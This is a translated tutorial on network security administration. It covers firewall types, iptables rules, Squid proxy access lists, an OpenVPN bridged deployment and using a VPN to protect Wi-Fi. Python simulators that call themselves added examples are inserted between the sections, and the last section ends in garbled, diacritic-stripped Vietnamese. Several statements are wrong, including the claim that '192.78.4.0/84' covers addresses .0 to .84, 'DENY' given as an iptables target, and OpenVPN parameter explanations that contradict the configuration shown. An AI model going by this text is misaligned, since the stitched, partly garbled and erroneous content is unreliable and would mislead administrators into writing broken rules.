- Source IP address
- Destination IP address
- Transport protocol (TCP, UDP, ICMP, IP tunnel, ...)
- Source TCP/UDP port
- Destination TCP/UDP port
- ICMP message type
- Incoming packet interface
- Outgoing packet interface
A firewall can also extract data from the packet at Layers 6 and 7: file type, URL, content, services, application, user, ...
d. Types of firewall
By placement:
- Network Firewall: protects the whole network
- Host Firewall: protects the single computer it is installed on (usually built into the OS or into security software such as Anti-Virus, Endpoint Security).
- Web Firewall: can be a Network Firewall or a Host Firewall whose function is to protect a web service against attacks.
By hardware and software platform:
- Software Firewall: usually installed on an OS, or a Linux OS with a software firewall built in
- Hardware Firewall: optimized by building the OS on the vendor's own hardware platform, which gives better processing performance.
By packet-processing capability:
- Packet Filter: operates at Layers 3 and 4 of the OSI model. Allows filtering packets at these two layers; this type of firewall can be regarded like an Access Control List on a router.
- Application Filter: operates at Layer 7. Allows creating rules that work at Layer 7 of the OSI model, such as URL and content.
- Stateful Filter: operates from Layer 3 to Layer 7: allows creating complex rules from IP, port, URL, file type, time, user, content, header, ...
- UTM: integrates the firewall with UTM functions. Because of the many features, processing performance is not high.
A new concept for a new generation of firewall, defined by Gartner (the organization that evaluates IT solutions) as the Next Generation Firewall, must have the following features:

- Support inline operation in the network (able to operate transparently from Layer 2)

- Provide the basic firewall features: packet filter, NAT, stateful, VPN

- Support network discovery (active hosts, services, applications, OS, vulnerabilities)

- Deep IPS integration (allowing configuration, rule editing, event impact flags)

- Application awareness: detect the services in use and apply deep policies such as blocking Skype or Yahoo Messenger

- Extra-firewall intelligence: for example, block one particular user from logging in to Facebook while the remaining users can still access it.

- Support continuous signature updates so that the system is always protected.

Gartner put forward this firewall concept and it is a feature of today's firewalls; many books I have seen have not yet included this concept, while in practice a great many of these systems are deployed.
e. Firewall placement in the network model
Designing a firewall that fits the network is very important; below I present some firewall deployment models:
Figure: Router acting as a packet filter

Figure: Firewall protecting the DMZ zone

Figure: Integrated network model at an organization (example)

Figure: Another example of a network model with an integrated firewall

In this model the devices are: a firewall, a dedicated BlueCoat proxy, a Sourcefire IPS, load balancing across multiple Internet links, a UTM firewall and many other security devices and solutions.

6. Configuring the iptables firewall on Linux

On Unix/Linux systems there are many firewalls... Among them is one that is configured and operated from the console, very compact and convenient: iptables. This article does not set out to describe the use of iptables in detail, but I hope that through it you can partly understand and configure iptables at a basic level...
First you need to understand how the iptables firewall handles packets leaving, entering or passing through the PC.
- Any packet that wants to enter your PC must pass through the INPUT chain.
- Any packet from your PC that wants to go out to the network must pass through the OUTPUT chain.
- Any packet that your PC forwards to another destination must pass through the FORWARD chain.
All of the above is supervised by iptables... and of course iptables has to be installed and set up :-) Configuring the INPUT chain, OUTPUT chain and FORWARD chain is called setting the rules for the firewall. iptables is mostly already installed in the kernel of the popular Linux versions of today: Redhat, Mandrake, SuSe...
If not, you can find iptables at:
http://www.linuxapps.com/
http://www.freshmeat.net/
Some simple configurations
Some common ports and services on a Unix/Linux system:

Port   Protocol   Service
21     TCP        FTP
22     TCP        SSH
23     TCP        TELNET
25     TCP        SMTP
53     TCP        NAME (DNS)
79     TCP        FINGER
80     TCP        HTTP
110    TCP        POP3
111    TCP        SUNRPC
443    TCP        HTTPS
901    TCP        SAMBA-SWAT
1024   TCP        KDM
3306   TCP        MYSQL
6000   TCP        X11

Now we start to look at the basic functions and configuration of iptables.

Example: when your PC sends a packet to http://www.yahoo.com/ requesting an HTML page, the packet first has to pass through the OUTPUT chain. At this point the rules come into play: they check the send request, and if it is valid the packet is allowed out. Then, when Yahoo replies to your machine, the reply packet must pass through the INPUT chain. Naturally it must match the rules before it gets into your machine. As troublesome and complicated as customs at Noi Bai airport, isn't it?
We start by working with specific IP addresses. Suppose you want to block all packets coming from 192.78.4.0.
-s is the option that matches a source IP address or DNS name. So we have the command:
iptables -A INPUT -s 192.78.4.0
If you want to handle the packets in more detail, the -j option lets you choose what to do with them: ACCEPT, DENY or DROP (used together with the -s option)... I probably don't need to give the Vietnamese meaning of the three words ACCEPT, DENY and DROP. If you want to DROP packets from the address 192.78.4.0:
iptables -A INPUT -s 192.78.4.0 -j DROP
DENY or ACCEPT work the same way ;-p
The command above ignores everything coming from 192.78.4.0.
We can also ignore one particular PC on a network. If you don't want the PCs in the network to talk to that PC, or to talk to the outside, you only need to change the chain (INPUT, OUTPUT) and the -s, -d options.
If we want to ignore Telnet reply requests from this PC: in this case at least three protocols can be specified: TCP, UDP and ICMP.
The -p option is used to specify the protocol to handle. Telnet is a protocol that runs on port 23/TCP, so we have the command:
iptables -A INPUT -s 192.78.4.0 -p tcp --dport telnet -j DROP
The commands above work on a single IP. If you want to work on many IP addresses at once (multiple IPs), there is a small change, as follows:
- 192.78.4.0/84 ==> all the IPs from 192.78.4.0 up to 192.78.4.84
- 192.78.4.* ==> all the IPs of the D block, from 192.78.4.0 up to 192.78.4.255

A slightly more complex configuration (just a little)
You have a LAN and an Internet connection. We agree to call the LAN eth0 and the Internet connection ppp0.
You want to allow the Telnet service on the PCs inside the LAN but not let it operate from the Internet (for safety reasons). Don't worry, iptables takes care of this for you. You can use the -i and -o options. Blocking on the OUTPUT chain turns out to be more reasonable than blocking on the INPUT chain. You can add the -i option:
iptables -A INPUT -p tcp --destination-port telnet -i ppp0 -j DROP
The command above blocks all Telnet requests, and the risk of Telnet attacks, from the outside into your LAN.
If you know which protocol the packets use, and if it is TCP, you can also easily know the port they use. When two PCs connect over TCP, the connection must be initiated first. This is the job of a SYN packet. A SYN packet tells the other PC that it is ready to connect. Only one PC has to send a SYN packet. If you block incoming SYN packets, you stop the other PCs from reaching the services that are open. That means it blocks the PCs in your LAN from the PCs on the Internet:
iptables -A INPUT -i ppp0 -p tcp --syn -j DROP
If you still want to keep a service but do not want the PCs on the Internet to communicate with it, only the PCs inside the LAN, then you can block all the SYN packets on the service's port:
iptables -A INPUT -i ppp0 -p tcp --syn ! --destination-port 80 -j DROP
By default the INPUT chain and the OUTPUT chain are always set to Accept, while FORWARD is always set to Deny. If you want to use the server and firewall as a router, you must set FORWARD to Accept.
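The rules above are evaluated in the order they were appended, the first match decides, and the chain policy applies only when no rule matched. The simulation below is an added example, not code from the article; it replays those three INPUT rules against constructed packets (the addresses and interface names are assumed, and the range is written with a CIDR prefix such as 192.78.4.0/24, which is the form iptables accepts). It shows that "--syn ! --dport 80" from ppp0 stops new connections to everything except port 80 while letting a port-80 SYN through, and that a packet carrying ACK instead of SYN passes the --syn rule untouched: --syn alone does not prove the connection was opened from inside, which is why production rule sets pair it with the conntrack state match.

```python
"""Simulation of iptables INPUT-chain evaluation: rule order, chain policy,
--syn matching and ! --dport negation. Added example, not from the original article."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

Packet = Dict[str, object]   # keys: iface, proto, src, dport, flags (constructed test packets)


@dataclass
class Rule:
    target: str                          # -j ACCEPT / DROP
    in_iface: Optional[str] = None       # -i
    proto: Optional[str] = None          # -p
    src: Optional[str] = None            # -s, CIDR prefix (e.g. 192.78.4.0/24)
    dport: Optional[int] = None          # --dport
    dport_negate: bool = False           # ! --dport
    syn: bool = False                    # --syn: SYN set and ACK/RST/FIN clear, i.e. a new connection

    def matches(self, pkt: Packet) -> bool:
        if self.in_iface is not None and pkt["iface"] != self.in_iface:
            return False
        if self.proto is not None and pkt["proto"] != self.proto:
            return False
        if self.src is not None and ipaddress.ip_address(str(pkt["src"])) not in \
                ipaddress.ip_network(self.src, strict=False):
            return False
        if self.dport is not None:
            hit = pkt.get("dport") == self.dport
            if hit == self.dport_negate:      # plain match needs a hit; negated match needs a miss
                return False
        if self.syn:
            flags: Set[str] = pkt.get("flags", set())  # type: ignore[assignment]
            if "SYN" not in flags or flags & {"ACK", "RST", "FIN"}:
                return False
        return True


class Chain:
    def __init__(self, policy: str = "ACCEPT") -> None:
        self.policy = policy          # iptables -P INPUT <policy>
        self.rules: List[Rule] = []

    def append(self, rule: Rule) -> None:   # iptables -A INPUT ...
        self.rules.append(rule)

    def verdict(self, pkt: Packet) -> str:
        for rule in self.rules:       # rules are tried in order; the first match ends the walk
            if rule.matches(pkt):
                return rule.target
        return self.policy            # nothing matched: the chain policy decides


def build_input_chain() -> Chain:
    """The rules from the section above, in order (ppp0 = Internet, eth0 = LAN)."""
    chain = Chain(policy="ACCEPT")
    # iptables -A INPUT -s 192.78.4.0/24 -j DROP
    chain.append(Rule("DROP", src="192.78.4.0/24"))
    # iptables -A INPUT -p tcp --dport telnet -i ppp0 -j DROP
    chain.append(Rule("DROP", in_iface="ppp0", proto="tcp", dport=23))
    # iptables -A INPUT -i ppp0 -p tcp --syn ! --dport 80 -j DROP
    chain.append(Rule("DROP", in_iface="ppp0", proto="tcp", syn=True, dport=80, dport_negate=True))
    return chain


SAMPLE_PACKETS: Dict[str, Packet] = {   # constructed packets, not captures
    "internet_new_ssh":    {"iface": "ppp0", "proto": "tcp", "src": "203.0.113.9", "dport": 22, "flags": {"SYN"}},
    "internet_new_http":   {"iface": "ppp0", "proto": "tcp", "src": "203.0.113.9", "dport": 80, "flags": {"SYN"}},
    "internet_ack_ssh":    {"iface": "ppp0", "proto": "tcp", "src": "203.0.113.9", "dport": 22, "flags": {"ACK"}},
    "internet_telnet_ack": {"iface": "ppp0", "proto": "tcp", "src": "203.0.113.9", "dport": 23, "flags": {"ACK"}},
    "lan_new_ssh":         {"iface": "eth0", "proto": "tcp", "src": "10.0.0.7", "dport": 22, "flags": {"SYN"}},
    "blocked_net_ping":    {"iface": "eth0", "proto": "icmp", "src": "192.78.4.77", "flags": set()},
}


def simulate() -> Dict[str, str]:
    """Verdict of the INPUT chain for every sample packet."""
    chain = build_input_chain()
    return {name: chain.verdict(pkt) for name, pkt in SAMPLE_PACKETS.items()}


if __name__ == "__main__":
    for name, verdict in simulate().items():
        print(f"{name:22s} {verdict}")
```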

There are many very good scripts on the Internet that configure rules for iptables. You can download them and apply them on your system right away. There are also some tools for configuring iptables under X.
Closing words
Security is always a complex matter that consumes a great deal of ink. I hope that through this article you will understand and grasp how to use iptables. Everything is only relative, so if you want to keep your system safe, you must always review and check the firewall, the bugs... and always stay at the highest state of readiness...
7. Installing and configuring SQUID as a proxy server
a. The Linux SQUID proxy server:

Squid is a proxy server. Its strengths are saving bandwidth, improving security and speeding up web access for users, and it has become one of the most popular and widely known proxies. There are currently many proxy-server programs on the market, but they have two disadvantages: first, you have to pay to use them; second, most of them do not support ICP (ICP is used to propagate changes to the content of the URLs held in the cache, the place where the web pages you have visited are stored). Squid is the best choice for a proxy-cache server: it meets our two requirements, free to use and supporting the ICP feature.

Squid provides an advanced caching technique for web clients and supports the common services FTP, Gopher and HTTP. Squid keeps the most recent information from those services in RAM, manages a large database of that information on disk, has a sophisticated access-control mechanism, and supports the SSL protocol for secure connections through the proxy. Furthermore, Squid can cooperate with the caches of other proxy servers to distribute the storage of web pages sensibly.

Next we will go through how to install a proxy server.

b. Installation:

First we should have some idea of the hardware requirements of a proxy server:

*** Hard disk access speed: very important, because Squid constantly reads and writes data on the disk. A SCSI disk with a high transfer rate is a good candidate for this task.
*** Disk space for the cache depends on the size of the network Squid serves: 1 to 2 GB for a medium network of about 100 machines. This is only an illustrative figure, however; the demand for Internet access is the factor that decides how much disk is needed.
*** RAM: very important; with too little RAM Squid will be noticeably slower.
*** CPU: need not be very powerful; around 133 MHz can run well with a load of 7 requests/second.

Installing Squid on RedHat Linux is very simple. Squid is installed if you select it during the initial installation. If you installed Linux without Squid, you can install it later with the rpm utility:
rpm -i squid-package-name.rpm
Squid is then installed and you can move on to configuring it.

Default squid directories:
/usr/sbin
/etc/squid
/var/log/squid

Installing from source:
+ With the squid source file squid-version.tar.gz, run the following commands:
tar xzvf squid-version.tar.gz
cd squid-version
./configure
make
make install
After running the commands above, squid is installed.

c. Configuring Squid:

- After installing squid, we must configure it to suit each particular requirement. We set a number of parameters in /etc/squid/squid.conf as follows:
** http_port: the default is 3128.
** icp_port: the default is 3130.
** cache_dir: declares the size of the cache directory for squid; the default is:
cache_dir /var/spool/squid/cache 100 16 256
The value 100 means 100MB is used as cache; if the disk is large we can raise it depending on the disk size. So squid stores its cache in /var/spool/squid/cache with a cache size of 100MB.
** Access Control List and Access Control Operators: we can use these two features to block and restrict access based on the destination domain, or on the IP address of a host or a network. By default squid refuses to serve everybody, so we must reconfigure this parameter. To do so, we add configuration suited to our requirements using two parameters: acl and http_access.
Example: we only allow the network 172.16.1.0/24 to use the proxy server, with the src keyword in acl.
acl MyNetwork src 172.16.1.0/255.255.255.0
http_access allow MyNetwork
http_access deny all

+ We can also forbid the hosts from reaching disallowed sites with the dstdomain keyword in acl; the leading dot makes the entry cover the domain and all its subdomains, for example:
acl BadDomain dstdomain .yahoo.com
http_access deny BadDomain
http_access deny all
+ If the list of blocked sites is too long, we can keep it in a text file holding the list of addresses, as follows:
acl BadDomain dstdomain "/etc/squid/danhsachcam"
http_access deny BadDomain
+ In the configuration above, /etc/squid/danhsachcam is the text file holding the disallowed addresses, written one per line.
+ We can have many acls; each acl must have an http_access, as follows:
acl MyNetwork src 172.16.1.0/255.255.255.0
acl BadDomain dstdomain .yahoo.com
http_access deny BadDomain
http_access allow MyNetwork
http_access deny all
+ So the configuration above shows that the proxy forbids the hosts from reaching the site www.yahoo.com, and only the network 172.16.1.0/24 is allowed to use the proxy. http_access deny all: forbids everything except what the declared acls allowed.

If the proxy cannot connect directly to the Internet and has no real IP address, or if the proxy sits behind a firewall, we must make the proxy query another proxy that can reach the Internet, with the following parameter:
cache_peer ITdep.hcmutrans.edu.vn parent 8080 8082

+ The configuration above shows that the proxy queries the parent proxy ITdep.hcmutrans.edu.vn, with the parent parameter, through http_port 8080 and icp_port 8082.

- Also, if there are several proxy servers in the same network, we can have these proxy servers query one another as follows:
cache_peer proxy2.hcmutrans.edu.vn sibling 8080 8082
cache_peer proxy3.hcmutrans.edu.vn sibling 8080 8082
sibling is used for proxies that are peers of each other.
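Squid reads http_access lines top-down, every acl named on a line must match for the line to apply, the first applicable line decides, and when none applies the default is the opposite of the last line. The evaluator below is an added example, not Squid's code or the document's; the configuration and the contents of the blocklist file in it are constructed from the directives shown above, and it models only the src and dstdomain acl types. It shows why the entries in a dstdomain file need a leading dot to cover subdomains, and that the order "deny BadDomain" before "allow MyNetwork" is what keeps the block effective for the permitted network.

```python
"""Squid access control: acl definitions (src, dstdomain, quoted file lists) and
http_access lines evaluated top-down, first match wins. Added example, not part of
the document; the configuration and the blocklist file are constructed."""
import ipaddress
from typing import Dict, List, Tuple

Acl = Tuple[str, List[str]]              # (acl type, values)
Rules = List[Tuple[str, List[str]]]      # (allow|deny, acl names that must all match)

SQUID_CONF = """\
acl MyNetwork src 172.16.1.0/255.255.255.0
acl BadDomain dstdomain .yahoo.com
acl BadList dstdomain "/etc/squid/danhsachcam"
http_access deny BadDomain
http_access deny BadList
http_access allow MyNetwork
http_access deny all
"""

# Constructed stand-in for /etc/squid/danhsachcam: one domain per line
FILES = {"/etc/squid/danhsachcam": "example.net\n.example.org\n"}


def load_config(text: str, files: Dict[str, str]) -> Tuple[Dict[str, Acl], Rules]:
    """Parse acl / http_access lines; a quoted value is a file holding one entry per line."""
    acls: Dict[str, Acl] = {"all": ("any", [])}      # Squid's built-in acl that matches everything
    rules: Rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "acl":
            name, kind, values = parts[1], parts[2], parts[3:]
            entry = acls.setdefault(name, (kind, []))
            for v in values:
                if v.startswith('"') and v.endswith('"'):
                    body = files[v.strip('"')]
                    entry[1].extend(l.strip() for l in body.splitlines()
                                    if l.strip() and not l.startswith("#"))
                else:
                    entry[1].append(v)
        elif parts[0] == "http_access":
            rules.append((parts[1], parts[2:]))
    return acls, rules


def acl_matches(acl: Acl, client_ip: str, host: str) -> bool:
    kind, values = acl
    if kind == "any":
        return True
    if kind == "src":
        ip = ipaddress.ip_address(client_ip)
        return any(ip in ipaddress.ip_network(v, strict=False) for v in values)
    if kind == "dstdomain":
        h = host.lower().rstrip(".")
        for v in values:
            v = v.lower()
            if v.startswith("."):                 # ".example.com": the domain and every subdomain
                if h == v[1:] or h.endswith(v):
                    return True
            elif h == v:                          # "example.com": that exact host only
                return True
        return False
    raise ValueError(f"acl type {kind} not modelled here")


def decide(acls: Dict[str, Acl], rules: Rules, client_ip: str, host: str) -> str:
    for action, names in rules:                   # top-down; all acls on a line must match (AND)
        if all(acl_matches(acls[n], client_ip, host) for n in names):
            return action
    last = rules[-1][0] if rules else "deny"      # nothing matched: opposite of the last line
    return "allow" if last == "deny" else "deny"


def decide_from_text(conf: str, files: Dict[str, str], client_ip: str, host: str) -> str:
    acls, rules = load_config(conf, files)
    return decide(acls, rules, client_ip, host)


if __name__ == "__main__":
    for ip, host in (("172.16.1.10", "www.yahoo.com"), ("172.16.1.10", "www.example.net"),
                     ("172.16.1.10", "mail.example.org"), ("10.0.0.5", "www.example.com")):
        print(ip, host, decide_from_text(SQUID_CONF, FILES, ip, host))
```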

d. Starting Squid:

- After installing and configuring squid, we must create the cache before running squid, with the command:
squid -z

If an error occurs while the cache is being created, check the permissions on the cache directory declared in the cache_dir parameter. The directory may not be writable. If so, change it with:
chown squid:squid /var/spool/squid
chmod 770 /var/spool/squid

After the cache directory has been created, start and stop squid with the init script as follows:
/etc/init.d/squid start
/etc/init.d/squid stop

Once squid is running, to monitor and manage the clients' access, or to see what squid is doing and how it is caching, we regularly examine the following files:
*** cache_log: contains warnings and status information about the cache
*** store_log: contains the records of what has just been added to the cache and what has expired
*** access_log: contains all the information about the clients' access, including source address, destination and time

The server side is installed; on the client side you must adjust the configuration with the server's address and the server's proxy port, for example as in the figure below:

8. Deploying a VPN on the OpenVPN platform

a. Overview of OpenVPN.
OpenVPN is an open-source tool used to build site-to-site virtual private networks (between a company's branches) with the SSL/TLS protocol or with pre-shared secret keys (PSK). Its role is to secure a data tunnel through a single TCP/UDP port across an insecure network such as the Internet, which is why a virtual private network is needed.
OpenVPN can be installed on almost any platform, including Linux, Windows 2000/XP/Vista, OpenBSD, FreeBSD, NetBSD, Mac OS X and Solaris.
Linux systems need kernel 2.4 or later. The configuration principles are the same on every platform.
OpenVPN is based on a client/server architecture. It must be installed on the VPN members, which are designated as server and clients.
OpenVPN creates a TCP or UDP tunnel and then encrypts the data inside the tunnel.
OpenVPN's default port is UDP 1194, a port officially assigned by the Internet Assigned Numbers Authority (IANA). You can use TCP or UDP; since release 2.0, a single port can serve several tunnels on the OpenVPN server.
You can choose to build either an Ethernet (bridged) or an IP (routed) VPN with the help of the TAP or TUN network driver respectively. TAP/TUN are available on all platforms and ship with Linux kernel 2.4 or later.
OpenVPN's options are especially important; for example, the server can push network routes to the client or can act as a DHCP server.
When static keys are used, the two VPN ends share the same key to encrypt and decrypt data. In that case the configuration is simple, but the problem is that you must deliver the key (over a secure channel) to someone at the other end of the tunnel whom you do not necessarily trust.
Public Key Infrastructure (PKI) is used to solve this problem. It rests on each party owning two keys: a public key known to everyone and a private key kept secret. This process is used by OpenSSL, the free, open-source implementation of SSL integrated into OpenVPN, to authenticate the VPN peers before data is encrypted.
Let us look at the advantages of the two modes:

OpenVPN mode             Pre-shared keys   SSL
Cipher mode              Symmetric         Asymmetric/symmetric
Implementation           Easy              Difficult
Speed                    Fast              Slow
CPU usage                Low               High
Key exchange             No                Yes
Encryption key renewal   No                Yes
Peer authentication      No                Yes

b. Deploying OpenVPN with SSL on Ubuntu Linux

OpenVPN uses a Public Key Infrastructure (PKI) to encrypt the VPN traffic between the nodes. A simple way of setting up a VPN with OpenVPN is to connect the clients through a bridge interface on the VPN server. This guide assumes that one VPN node, the server in this case, has a bridge interface configured.
Step 1: Install OpenVPN.
To install OpenVPN, enter in an Ubuntu terminal:
sudo apt-get install openvpn

Step 2: Deployment model

VPN deployment model: Server-PT acts as the VPN server and Client PC-PT acts as the VPN client, connecting to the server across the Internet.
The VPN server runs Ubuntu Server. The client runs Ubuntu Desktop.

Step 3: Set up the server certificates

After installing OpenVPN, we create the certificates for the VPN server.

First, copy the easy-rsa directory to /etc/openvpn. This ensures that any changes to the scripts are not lost when the package is updated. You also need to adjust the permissions of the easy-rsa directory so that the current user can create files. In the terminal enter:

sudo mkdir /etc/openvpn/easy-rsa/
sudo cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* /etc/openvpn/easy-rsa/
sudo chown -R $USER /etc/openvpn/easy-rsa/

Next, edit /etc/openvpn/easy-rsa/vars with your own information:

export KEY_COUNTRY="VN"
export KEY_PROVINCE="NC"
export KEY_CITY="HANOI"
export KEY_ORG="NETPRO-ITI"
export KEY_EMAIL="chiennv@netpro.edu.vn"

Enter the following to create the server certificates (the CA must exist before the server key can be signed, so the CA step comes first):

cd /etc/openvpn/easy-rsa/
source vars
./clean-all
./pkitool --initca          # or the interactive ./build-ca
./pkitool --server server   # or the interactive ./build-key-server server
./build-dh
cd keys
openvpn --genkey --secret ta.key
sudo cp server.crt server.key ca.crt dh1024.pem ta.key /etc/openvpn/
Step 4: Set up the client certificates

The VPN client also needs a certificate to authenticate itself to the server. To create the certificate, enter the following in the terminal:
cd /etc/openvpn/easy-rsa/
source vars
./pkitool hostname
Replace hostname with the actual hostname of the machine that connects to the VPN.
Copy the following files to the client:

/etc/openvpn/ca.crt
/etc/openvpn/easy-rsa/keys/hostname.crt
/etc/openvpn/easy-rsa/keys/hostname.key
/etc/openvpn/ta.key

Remember to adjust the file names to the client's hostname.

It is best to use a secure method to copy the certificates and keys. The SCP utility is a good choice, but copying the files to the client by traditional means can also work.
Step 5: Configure the server
Now configure the OpenVPN server by creating /etc/openvpn/server.conf from the example file. In the terminal enter:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/
sudo gzip -d /etc/openvpn/server.conf.gz
Edit /etc/openvpn/server.conf to match the configuration below:
local 192.168.78.128
dev tap0
[the ca file filename.crt must be placed in /etc/openvpn/]
[cert and key likewise]
;up "/etc/openvpn/up.sh br0"
;down "/etc/openvpn/down.sh br0"
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
;push "dhcp-option DOMAIN netpro.edu.vn"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2

local: the IP address of the bridge interface.

server-bridge: required when a bridge is used. 172.18.100.101 255.255.255.0 is the bridge interface address and mask. The IP range 172.18.100.105 - 172.18.100.200 is the range of addresses that will be handed out to the clients.

push: the directive that adds network routes for the client

user and group: set the user and group that the OpenVPN daemon runs as

Replace all the IP addresses and domain names above with those of your network.

Next, create a couple of scripts that add the tap interface to the bridge (a line starting with ";" in server.conf is a comment, so the up and down lines above must have the ";" removed for these scripts to run). Create /etc/openvpn/up.sh:
#!/bin/sh
BR=$1
DEV=$2
MTU=$3
/sbin/ifconfig $DEV mtu $MTU promisc up
/usr/sbin/brctl addif $BR $DEV
And /etc/openvpn/down.sh:
#!/bin/sh
BR=$1
DEV=$2
/usr/sbin/brctl delif $BR $DEV
/sbin/ifconfig $DEV down
Then set the permissions:
sudo chmod 755 /etc/openvpn/down.sh
sudo chmod 755 /etc/openvpn/up.sh
With the server configured, restart OpenVPN by entering:
sudo /etc/init.d/openvpn restart
Step 6: Configure the client.

First install OpenVPN on the client:

sudo apt-get install openvpn
Then, with the server's certificates for the client copied into /etc/openvpn/, create a client configuration file by copying the example. In the client's terminal enter:
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf /etc/openvpn
Change /etc/openvpn/client.conf to the following configuration:
dev tap
remote 192.168.78.128 1194
cert hostname.crt
key hostname.key
tls-auth ta.key 1
Replace vpn.example.com with the hostname of your VPN server, and hostname.* with the actual certificate and key file names.
Finally restart OpenVPN:
sudo /etc/init.d/openvpn restart
Now you can connect to the remote LAN over the VPN.
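Several values in the server and client configurations above have to agree with each other: the server-bridge pool must lie inside the bridge subnet and must not contain the gateway address, tls-auth takes direction 0 on the server and 1 on the client, both sides must use the same tunnel type (tap for a bridged VPN), and the client's remote port must be the server's listening port. The checker below is an added example, not OpenVPN's code or the guide's; the two configuration texts in it are constructed from the values used in the guide, with ca/cert/key lines filled in for the files copied in step 3 and a "port 1194" line added for the default port.

```python
"""Consistency checks for an OpenVPN bridged server.conf / client.conf pair.
Added example, not from the guide; the two configs below are constructed from the
values used in the guide, with ca/cert/key lines filled in for the files copied in step 3."""
import ipaddress
from typing import Dict, List

SERVER_CONF = """\
local 192.168.78.128
port 1194
dev tap0
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
;server 10.8.0.0 255.255.255.0
server-bridge 192.168.78.128 255.255.255.0 192.168.78.50 192.168.78.100
push "route 192.168.78.128 255.255.255.0"
push "dhcp-option DNS 192.168.78.128"
tls-auth ta.key 0 # This file is secret
user nobody
group nogroup
log-append openvpn.log
verb 2
"""

CLIENT_CONF = """\
client
dev tap
remote 192.168.78.128 1194
ca ca.crt
cert hostname.crt
key hostname.key
tls-auth ta.key 1
"""


def parse_ovpn(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the argument lists it appears with; ';' and '#' start comments."""
    out: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(";"):
            continue
        parts = line.replace('"', "").split()
        out.setdefault(parts[0], []).append(parts[1:])
    return out


def check_pair(server_text: str, client_text: str) -> List[str]:
    """Return a list of findings; an empty list means the pair passed every check."""
    srv, cli = parse_ovpn(server_text), parse_ovpn(client_text)
    findings: List[str] = []

    # server-bridge gateway netmask pool-start pool-end: pool inside the subnet, ordered, gateway excluded
    for args in srv.get("server-bridge", []):
        gw, mask, start, end = args[:4]
        net = ipaddress.ip_network(f"{gw}/{mask}", strict=False)
        gw_ip, s, e = (ipaddress.ip_address(x) for x in (gw, start, end))
        if s > e:
            findings.append("server-bridge: pool start is above pool end")
        if s not in net or e not in net:
            findings.append("server-bridge: pool lies outside the bridge subnet")
        if s <= gw_ip <= e:
            findings.append("server-bridge: pool contains the gateway address")

    # tls-auth: present on both sides, direction 0 on the server and 1 on the client
    s_ta, c_ta = srv.get("tls-auth"), cli.get("tls-auth")
    if not s_ta or not c_ta:
        findings.append("tls-auth missing on one side: control-channel packets are not HMAC-authenticated")
    else:
        s_dir = s_ta[0][1] if len(s_ta[0]) > 1 else None
        c_dir = c_ta[0][1] if len(c_ta[0]) > 1 else None
        if (s_dir, c_dir) != ("0", "1"):
            findings.append(f"tls-auth direction must be 0 on the server and 1 on the client, got {s_dir}/{c_dir}")

    # dev: both sides must use the same tunnel type (tap for a bridged VPN)
    s_dev = srv.get("dev", [[""]])[0][0].rstrip("0123456789")
    c_dev = cli.get("dev", [[""]])[0][0].rstrip("0123456789")
    if s_dev != c_dev:
        findings.append(f"dev mismatch: server {s_dev!r} vs client {c_dev!r}")

    # the client's remote port must equal the server's listening port (default 1194)
    s_port = srv.get("port", [["1194"]])[0][0]
    for args in cli.get("remote", []):
        c_port = args[1] if len(args) > 1 else "1194"
        if c_port != s_port:
            findings.append(f"client remote port {c_port} differs from server port {s_port}")

    # privilege drop and certificate material
    for d in ("user", "group"):
        if d not in srv:
            findings.append(f"server has no '{d}' directive: the daemon keeps root after startup")
    for side, cfg in (("server", srv), ("client", cli)):
        for d in ("ca", "cert", "key"):
            if d not in cfg:
                findings.append(f"{side}: '{d}' directive missing")
    return findings


if __name__ == "__main__":
    for f in check_pair(SERVER_CONF, CLIENT_CONF) or ["no findings"]:
        print(f)
```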

9. Using a VPN to protect a Wi-Fi system

a. Wi-Fi security methods
In this section I present a security solution for the Wi-Fi service. Wi-Fi networks are now used very widely, but many people do not fully understand the security holes present in Wi-Fi systems. This article introduces the technique of applying a VPN to secure a Wi-Fi network.
The security features built into an Access Point:
- Not broadcasting the SSID
Not broadcasting the SSID can be a solution against some attackers with limited knowledge of wireless networks; those are often not dangerous anyway. Besides, the SSID has to be carried in every frame of the wireless network, and the SSID and MAC are not encrypted when the frames are transmitted. Any wireless attack tool can therefore detect networks that do not broadcast their SSID.
- MAC Address Filter
A feature configured on the Access Point that only lets certain MAC addresses connect to it. This solution looks fine, but unfortunately there are many tools today that capture wireless frames; the MAC address and SSID are not encrypted in any frame, and an attacker easily discovers the MAC addresses that are allowed to reach the Access Point. There are also many tools for spoofing a MAC address.
- WEP
This is an encryption method using a shared key between the device and the Access Point, but unfortunately there are many tools that can decrypt the frames and recover the key for this method.
- WPA
This looks secure, but unfortunately the latest wireless cracking tools, such as Aircrack, support attacking wireless networks that use this encryption protocol.
So are we helpless?
- Today the only wireless security solution that can be trusted is to use a VPN.
- The VPN deployment model for the Access Point is shown in the figure below:

b. Configuring the Access Point and the VPN server on Windows Server 2003

- Configure the Access Point
- Enable the VPN feature on the Windows Server 2003 server
- Create VPN connections from the wireless devices (laptops).
- I am using a Linksys Access Point
- The device has: 1 Internet port, 4 LAN ports
- Plug the cable from the switch into the Internet port; I do not need the 4 LAN ports
- After the steps above I log in to the Access Point to start configuring; after reaching the Access Point through its web interface I configure the Access Point's IP address.
- For the Internet port on the Access Point I set the address 192.168.50.33; the parameters I set are shown in the figure below.
- The gateway IP address for the Wi-Fi devices I set to: 192.168.1.1
- The IP range assigned to the devices connecting to the Access Point is: 192.168.1.0/24
- After the steps above I configure the Security feature for the Wi-Fi connections

Page | 83 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

Cu hnh bo mt:
- Chn Security Mode l: WPA2 Personal
- Chn thut ton m ha cho giao thc WPA l: TKIP+AES
- Key khi cc thit b mun kt ni ti mng Wireless ny l: vnexperts.net


- My SSID is VNEXPERTS.NET

